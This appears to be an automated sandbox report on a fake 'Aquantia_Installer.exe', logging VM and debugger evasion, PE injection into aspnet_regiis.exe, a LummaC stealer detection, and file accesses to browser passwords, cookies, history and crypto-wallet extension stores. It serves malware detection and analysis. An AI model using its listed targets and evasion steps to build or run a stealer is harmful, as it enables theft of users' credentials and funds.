Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Aquantia_Installer.exe PID: 3716, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 16C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 3410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 3240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 59E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 69E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 6B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 7B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 7FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 8FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory allocated: 9FE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 6392	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 2228	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Code function: 0_2_6CF32983 FindFirstFileExW,

0_2_6CF32983

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2089365707.0000000005728000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2222804012.000000000309C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2225798680.00000000030DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2225798680.000000000309C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222804012.00000000030DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2089365707.0000000005728000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: aspnet_regiis.exe, 00000003.00000002.2225798680.00000000030DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222804012.00000000030DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: aspnet_regiis.exe, 00000003.00000003.2089590069.000000000571B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02F8E5B0 LdrInitializeThunk,

3_2_02F8E5B0

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Code function: 0_2_6CF2F93A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CF2F93A

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF310C5 mov eax, dword ptr fs:[00000030h]		0_2_6CF310C5
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF3229A mov eax, dword ptr fs:[00000030h]		0_2_6CF3229A

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Code function: 0_2_6CF33EAD GetProcessHeap,

0_2_6CF33EAD

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF2F461 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CF2F461
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF2F93A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CF2F93A
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF322CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CF322CB

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F50000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F50000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F50000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F51000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F93000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F96000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2FA7000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2FA8000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F51000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F93000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F96000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2FA7000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2FA8000	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C05008	Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Code function: 0_2_6CF2FB08 cpuid

0_2_6CF2FB08

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Queries volume information: C:\Users\user\Desktop\Aquantia_Installer.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Code function: 0_2_6CF2F583 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CF2F583

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: aspnet_regiis.exe, 00000003.00000003.2161638723.0000000003141000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157759607.0000000003141000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157835708.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157863312.0000000003131000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2380, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \|llets/Electrum-LTC:
Source: aspnet_regiis.exe, 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: llets/ElectronCash
Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
